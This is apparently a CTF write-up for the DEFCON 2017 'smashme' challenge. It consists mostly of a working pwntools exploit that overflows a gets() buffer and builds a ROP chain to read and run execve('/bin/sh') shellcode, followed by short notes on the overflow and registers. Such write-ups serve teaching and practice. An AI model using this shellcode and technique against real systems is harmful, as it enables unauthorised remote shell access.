Pwnable/CTF

DEFCON 2017 smashme

HSr00t 2017. 5. 2. 23:16
from pwn import *

p = remote("192.168.146.133", 9001)
elf = ELF("./smashme")

read_plt = elf.symbols["read"]   # read() is reached through its PLT entry
bss = elf.bss() + 0x20           # scratch area in .bss where the shellcode is written

# 27-byte x86-64 execve("/bin/sh") shellcode (shell-storm 806)
shellcode = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"

# pop rsi / pop rdi / pop rdx gadgets used to set up the read() arguments
shell_rsi = 0x004015f7
shell_rdi = 0x004014d6
shell_rdx = 0x00441e46

# The string the binary's branch compares against; the trailing A's pad the
# buffer up to the saved return address
filt = b"Smash me outside, how bout dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

payload = filt
payload += p64(shell_rsi)
payload += p64(bss)              # rsi = destination buffer
payload += p64(shell_rdi)
payload += p64(0)                # rdi = fd 0 (stdin)
payload += p64(shell_rdx)
payload += p64(len(shellcode))   # rdx = byte count
payload += p64(read_plt)         # read(0, bss, len(shellcode))
payload += p64(bss)              # read() returns into the shellcode

p.sendline(payload)
p.sendline(shellcode)
p.interactive()


Looking at the binary in IDA, there is a buffer overflow vulnerability through the gets function.


You will see one branch: if the input is not that string (the string in the filt variable), the program quits; if it matches, it proceeds normally to leave; ret.


The shellcode is a 64-bit syscall shellcode (source: http://shell-storm.org/shellcode/files/shellcode-806.php).


64-bit argument registers (in order):

rdi - 1st argument

rsi - 2nd argument

rdx - 3rd argument

rcx - 4th argument